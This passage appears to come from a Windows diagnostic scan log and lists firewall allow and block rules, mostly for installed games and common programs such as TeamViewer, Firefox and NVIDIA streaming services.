FirewallRules: [{8164E9B5-1CD4-4DEE-973A-2044F5D60E5F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B0415D83-40EB-4823-ABD4-12D1066AB19E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{722FA4B4-31E2-4F37-AD00-61F59C03A845}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{6F83E4F5-AAA5-42DE-8F9D-FBB0BEB63EFC}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [UDP Query User{DB911C0D-75DB-45A8-86F6-9EF94D76AD42}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [TCP Query User{2351E6A2-122B-4E05-905A-88BDBF6DB57E}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [UDP Query User{A9B82257-97FF-426A-8632-55C2E5532F54}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [TCP Query User{45050945-6D3F-4D57-9CC8-FDA007D83A8B}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [UDP Query User{E7B05CD4-74AA-40C8-9E10-7961E53F21DF}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [{DC297BE2-B8D3-4C65-B87D-B63DC2C73B88}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45C1643D-955A-4777-BE45-9ABDA65D7E07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{A57A95CC-8712-4768-A828-D5C7A3C090F3}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [UDP Query User{69952427-AF52-443D-A4E1-70B140A97672}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [TCP Query User{16122460-E2CD-4566-B5DC-42712F3DE8EF}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{5ECF7D77-E9FA-477D-A7E7-D7ED39C5A5F2}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [{A8D5F529-DCD1-4FDA-BAB7-21D75192F6DA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [{F73EF0DE-71F6-4D78-A751-ADBD04752DF9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [TCP Query User{6874CB65-0F5F-487E-96D2-2E9D41C236F5}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [UDP Query User{EDC5A005-882F-439D-9609-CD03815D3841}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [{C1D9F0A3-FF2D-4386-B8A1-FC66E9C94E6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{269D0535-C251-4043-A842-DC60623DC634}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{7A779327-2587-4326-9D15-E79A2F3F055F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{8320FB98-828B-4932-9A94-21B867456F90}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [TCP Query User{9999040C-3648-45A1-8B0E-BDF1B3CA133F}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [UDP Query User{90D2846A-4BE4-4E4D-B9D1-2DDDA98866D9}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [TCP Query User{C4B6E894-1C14-4A73-AB91-825B611F1E25}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [UDP Query User{718E056C-2030-4D29-B4D8-281FF84A0063}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [TCP Query User{981E6CCF-911E-4BB6-9BDE-F9BE60F1FC49}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{9D625DCF-2803-443A-A39F-5BB8D22EE3D1}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{796658D6-38B6-4B01-BFF0-6C9766F89B8F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{026DA7C2-00A3-4743-8248-993D97678418}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{25DBFAF5-8C5E-4951-B0F2-E3444F0BA6E4}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [UDP Query User{31DB31AD-B312-4DB8-BFED-C898D6B379EA}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [{08FD0B95-B6FF-4AAE-AD20-9D98F039FF7B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{F936ABFF-170D-46EF-A8A8-9D3DC696C88F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{A19D7310-0EA2-40F7-ACC1-4F8DF0C9F7C6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{BEB0FEE9-4558-4DEF-B073-31911291551A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{9E75A985-D059-493E-84CE-E4DFAD5107DD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [{662A7F55-A717-4C86-B911-5CE3CFCF5E9F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [TCP Query User{D2AC309E-9958-42E6-B540-8EF8E661943B}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{AD605CAB-0CC7-411D-BACF-F5306499F43D}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [{21308C21-15BC-4C73-AC44-2E6EED72A984}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{E5D7FFC3-A7F6-4721-B0F8-4F35BF795C5F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{6584EECA-A2DA-45B6-BF7E-81C0C250282A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ECDAABD8-7E3F-40FB-A9CF-3C06B62FFB4C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{0919E39F-10B6-4737-A5C2-62953C825226}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{4D350746-BCCC-483E-B8E2-12CAA6A40386}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8E40FC5B-4072-47CF-8B69-8006BC435CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D08EFB35-473A-442B-A543-E08464001647}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{6B7260B7-CE43-44F8-8F83-96BA07DF356B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{E2B7627B-628F-4B51-A780-A4EB9ECACEB6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [{8C9BD548-32BF-49BB-9202-1AA981952EA0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [TCP Query User{FCC21E56-917A-448D-BC59-743E8D74F0C9}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [UDP Query User{0A5E8A79-55CB-47C8-BB0B-A12F2BC8F14C}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [TCP Query User{1B858E4D-0485-4D54-9183-AE75B20D8854}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [UDP Query User{8DD1BFC3-FE50-4431-AE63-BD0DB0817ADA}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [{64BFD6AB-8E20-4AE9-AE23-725CF5FC849A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A531C7D2-3E9E-4204-9643-7BCBB06617C8}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [UDP Query User{3D1F26BE-E928-4D9F-BFD3-391F2A07FF09}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [{F6B6969E-325A-4E1A-A90C-BEA2B1A1DAAA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76E1DBB9-EFBC-48E9-B5BA-FE535A8685E2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{E3106317-FDAA-4CD0-A39E-A660AF03548C}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [UDP Query User{64F31AA8-3C83-4940-8B7A-BB9F03D708A2}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [{9A30AC21-A19E-473C-846E-824196B9E37A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{AC88119B-D54F-4D22-A23F-FC336B5B3FE3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{F5A1B688-4DE9-4BF7-89D2-D0FE92D6CE43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{AB75E7A9-563F-4519-B6BA-128A465905E5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{D7EABB63-C0E8-418D-9792-0512F31AD004}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{1CB74876-21DE-407F-A0B2-FDE7F9F38EC9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{9B9FF0BC-4B86-405E-AB5E-6F3AA8EE9A66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [{3AFD306B-53D9-45A5-90DD-884175D2831F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [TCP Query User{11E3CD2A-BFE1-4427-BF04-4A1C75D2F196}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [UDP Query User{A69725A6-B8F4-42F0-A9BB-3100B4AC7F21}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [TCP Query User{B4E0D202-9DD8-4535-BC9F-C83BC97D092D}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [UDP Query User{C88B50F5-D440-440A-8984-9524D85A6860}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [{1B83618F-D02D-42A8-9651-26E419CD1EFD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [{DCC47D05-2539-4E99-809D-58CD3ED4EBC8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [TCP Query User{7483B01C-FD81-471A-91F3-F27FD8DED9BD}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{A1599774-927D-4906-A136-8EC9ACF6AFC7}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [{680C6942-7D40-4B01-9458-96ADE595E3AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9F7449B-0201-40D7-8E35-997E33F94A96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8FA2650D-F133-4798-AA68-FA546B43510E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{F2EF4ACE-4392-41EA-9A3D-818A9B30333A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{6B5C548F-0E30-41E6-8D48-7A162673479B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [{A5C0D7A5-9D50-4F01-8E97-27EC3563F5AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [TCP Query User{2731C65B-2AA9-4B8E-B4DA-88ACF00DBE5B}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [UDP Query User{2B62053B-324C-4636-91E9-DC9A0B7AAFF4}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [TCP Query User{A66CA3B5-9472-41C7-8BD8-CAA2E73FAD07}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{A5C11343-440F-4262-BD52-9E2F69B4F9EF}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [{9A330E71-4D27-42BC-9BC2-E5E8A8FF02CF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{2BC15E28-7E54-4572-A964-B96FC4DB517B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{568660FF-CAB1-45BA-B56E-43C90666721F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{9B05ECAE-6B44-4697-99A1-45B01D3DD64C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{76A57225-C3BD-4B04-9B9A-7A40234CAB14}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [{92128767-4267-40DA-B246-B3621A522DA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [TCP Query User{F4A54B63-A8E2-4452-8180-850077D20496}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [UDP Query User{1EB19545-AA76-4B4D-8FA0-89BC76AF3D9D}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [TCP Query User{1DB3C684-26CE-478E-B0DD-F51D8611E804}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [UDP Query User{D68A1112-A5DA-4D38-A500-B16AB85A58D8}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [TCP Query User{7A51F80D-554A-454F-9E5A-F539A4E5C285}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [UDP Query User{5D8931EF-4E7D-4C1D-9E38-AF85FB859C23}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [{6853BAB0-1C4A-4E18-B5B6-EECEF7E1DF09}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{B567282B-F73F-4CEA-BE2F-2CBE938EAB18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{492F1B4D-3B0C-4C98-B606-579059012453}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{56B6A10D-4D74-4722-BC01-33852584F8CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{B86F862D-C8D6-4C3E-B788-B5C6D93F3C1A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{E649E9B4-0ABB-490F-9692-A3E981030DF2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{FA2A2058-9CC5-4459-9D95-47A89CD852E7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{ADCF1868-E26E-4EA4-85F6-A277BB4D94D6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [TCP Query User{DA1A4364-51A0-4A13-A617-34927AD2E0B4}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [UDP Query User{53DB7273-588B-4631-B918-C1DFCF0B5364}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [{0974B5FB-67A5-4311-93C8-3E31C934201B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [{23BBB59C-4E38-4F12-ACB5-AF621E695D47}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [TCP Query User{14EF59FD-4CBE-4477-BBF6-400D49178375}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [UDP Query User{6417FD98-D5AA-4DA6-9D9A-088A5C581014}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [TCP Query User{8623F9D7-F7B7-45A6-9E24-202C5CFE17C3}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [UDP Query User{D93CC1A3-71E8-4230-9363-9E43414DAB17}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [{E9AB914A-8CDB-4D70-B686-42574EAB783E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{074E5D98-B4C1-47E6-BE65-7067C306E683}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{EA0D1741-86B9-4111-A53B-D44A614EC2CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{A81051AC-4649-42D9-B644-43E4ADEB4EC7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{4ECF7C43-C7AC-41F1-AA43-78B4B7C00AA2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{2D1981B0-37C6-4A34-83FF-C25CDBFED6AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{750F14FD-12C1-459B-97AF-8045788F4A02}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{BFCEA83A-D98F-4CE9-AF70-0BEB8A98845D}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [TCP Query User{26F32E06-8C99-4C4E-A88C-110F0BC5DEB9}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [UDP Query User{C97AC77B-B9AB-4ACF-BD03-C9C9FD6606B1}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [{638BA54D-2635-4759-BDFC-2D46474B6D37}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{E9B6E224-F758-479F-8277-959B1D50D0E5}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1FE04074-9729-4611-A59B-6D1AD71FD0C4}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{3280B250-6F0E-46DD-8C7B-3AEE07BD6DA7}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{547FC444-5AC5-4171-8C2B-BC25DA6AD60F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{A70540E2-2F15-4B16-8EBF-9223237DB1D7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{B7FB3B81-9945-4456-AB4E-F3F462731DE7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{8D737F82-F9FE-4C2D-9234-9B6578374AE1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{281F067D-4520-4004-80F6-32A0E6089BD1}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\DeviceSetup.exe
FirewallRules: [{070E3BD2-A6A8-4891-97D6-A4D2D79B90ED}] => (Allow) LPort=5357
FirewallRules: [{BC6962E0-A9E1-45E9-8CF2-F4BA0CE26FFF}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{5561F357-1028-459A-B796-A4D123A8600D}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [UDP Query User{12859DF5-D5D5-4025-B2F8-E39E76CBB2AA}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [TCP Query User{7EE8CDD9-35C7-430D-95D8-451C632D7DCF}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [UDP Query User{F311FB22-AA27-4EC6-8AE7-1D9691835D1C}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [{33E129CF-48F9-46CD-BCC7-DD8BA14AF12D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{16831414-067E-45D0-A4D5-E68B529DB6D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{50A06F50-7F3D-4BDC-9021-237A4C0B2C27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [{1B14D338-DD94-4F52-AD5C-19A32CD5A7BC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [TCP Query User{4C44DD46-D7A9-4196-8296-EEC3056A05BA}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [UDP Query User{0E56461D-D37A-4C4F-A638-64AA8F253EF7}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [TCP Query User{7B48B31B-0302-4CA8-9E87-F07AB35F2D86}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [UDP Query User{0CAAB1E6-B8C4-4C54-8EED-E55C7FFDD98D}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [{4EE9956F-18E1-400E-BF78-B16CA5740983}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{1F4F4B1F-6EB7-49F2-BEB5-C5D20017F534}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{4E13484E-599F-4A55-8783-90ECC346BE91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{EB02CC0B-C01C-4CF1-B865-43DD5B64DA66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{56A01BA7-991A-4E71-996A-9DB735036A2A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [{164D6B17-3E23-4D7A-8EC8-9B92D2908A27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
